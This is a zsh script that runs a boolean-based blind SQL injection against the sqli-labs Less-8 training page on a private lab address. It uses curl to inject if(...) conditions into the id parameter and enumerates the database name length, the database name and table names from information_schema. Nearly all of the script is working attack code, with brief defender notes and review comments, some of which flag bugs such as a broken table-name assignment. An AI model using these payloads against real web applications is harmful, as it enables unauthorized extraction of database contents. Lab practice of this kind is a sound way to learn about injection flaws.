#!/bin/zsh

# Boolean-based blind SQL injection probe against the sqli-labs Less-8
# training target configured below: every request places an
# if(<condition>,1,0) expression into the `id` parameter and checks the
# response body for `flag` to tell a true condition from a false one.
# Defender notes: the resulting traffic is a long run of near-identical GETs
# that differ only in a small integer, which is easy to spot in access logs
# or WAF telemetry; parameterized queries on the server remove the injection
# point entirely.
flag="You are in..........."

# last octet of the lab host (192.168.3.x, private range)
IP="115"
# URL prefix: injection point is the id parameter, `%27and%20` closes the quote
US="http://192.168.3.${IP}/sqli-labs/Less-8/?id=1%27and%20"
# URL suffix: closes the if(...) and comments out the rest of the query
UE=",1,0)%23"
dbs=0
# 0. db length

function get_length() {
  # Probe the candidate lengths 1..15 for the condition described by $1.
  #   $1 - SQL prefix ending just before the number under test
  #        (e.g. "if(length(database())=")
  #   $2 - documented by the caller as a suffix but not used: the suffix
  #        is always the global UE
  # Prints the first length whose response contains $flag, or 0 when none
  # of 1..15 matched. Reads globals US, UE, flag; writes global url.
  local found=0
  local prefix=$US$1

  for i in {1..15}; do
    url=$prefix$i$UE
    # grep's exit status decides: 0 means the "true" page came back
    if curl -s "${url}" | grep -q "$flag"; then
      found=$i
      break
    fi
  done
  echo $found
}

# SQL prefix for get_length: compares length(database()) with the probed number
a="if(length(database())="

dbs=$(get_length $a)
echo "db length: $dbs"


# 1. db name

function get_name() {
  # Recover a string one character at a time.
  #   $1 - number of positions to probe (n)
  #   $2 - SQL prefix placed before the position index
  #   $3 - SQL fragment placed between the position index and the ASCII code
  # For each position 1..n the codes 97..122 (lowercase a-z only) are tried
  # and the first one whose response contains $flag is appended; a position
  # holding any other character contributes nothing to the result.
  # Prints the recovered string. Reads globals US, UE, flag; writes global url.
  local name=""
  local head=$US$2
  local mid=$3
  local tail=$UE

  for i in {1..$1}; do          # zsh expands {1..$1}; bash would not
    for (( j = 97; j <= 122; j++ )); do
      url=$head$i$mid$j$tail
      # grep's exit status decides: 0 means the "true" page came back
      if curl -s "${url}" | grep -q "$flag"; then
        # turn the matching ASCII code into its character
        name+=$(awk -v c="$j" 'BEGIN { printf("%c", c) }')
        break
      fi
    done
  done
  echo $name
}

# fragments for get_name: if(ascii(substr(database(), <pos>, 1)) = <code>
dba="if(ascii(substr(database(),"
dbb=",1))="
db=""

# dbs (from get_length above) is the number of positions to probe
db=$(get_name $dbs $dba $dbb)

echo "db is: ${db}"


# 3. tables
tbs=0
# length of the first table name in schema 'security' (limit 0,1);
# spaces are already written as %20 here
a="if((select%20length(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)="

tbs=$(get_length $a)

echo "tbs : $tbs"

# 4. table_name

tables=
# same query as `ta` below with the LIMIT offset fixed at 0; not referenced
# again in this file as far as visible — presumably a leftover, confirm
ta1="if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),"
ta1=${ta1//\ /%20}   # URL-encode the spaces

# before b comes the string index, after b the ASCII code
ta="if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit "
ta=${ta//\ /%20}     # URL-encode the spaces
tb=",1),"
tc=",1))="

function get_tables() {

  # $1 is length  — also the loop bound: i runs 0..$1 and is used as the
  #                 LIMIT offset in the query assembled from $2 and $3
  # $2 is sqla    — SQL text placed before the offset
  # $3 is sqlb    — SQL text placed between the offset and the position index
  # $4 (not described in the original) is passed through to get_name as its
  #    third argument, the fragment that precedes the ASCII code
  # Looks intended to collect table names into the global `tables`.
  # NOTE(review): $1 is used both as the loop bound and as the name length
  # handed to get_name, so every table is probed to the same length.
  # NOTE(review): `a` is not declared local here, so this overwrites the
  # global `a` set earlier in the file.

  for i in {0..$1}
  do
      a=$2$i$3
      # get table name length & to name
      # NOTE(review): this word starts with `$tables=`, so the shell expands
      # it and treats the result as a command rather than an assignment;
      # `tables` appears to keep its initial value — confirm
      $tables=$tables" "$(get_name $1 $a $4)
  done
}
# get_tables is expected to fill the global `tables` that is printed below
get_tables $tbs $ta $tb $tc

echo "tables: $tables"
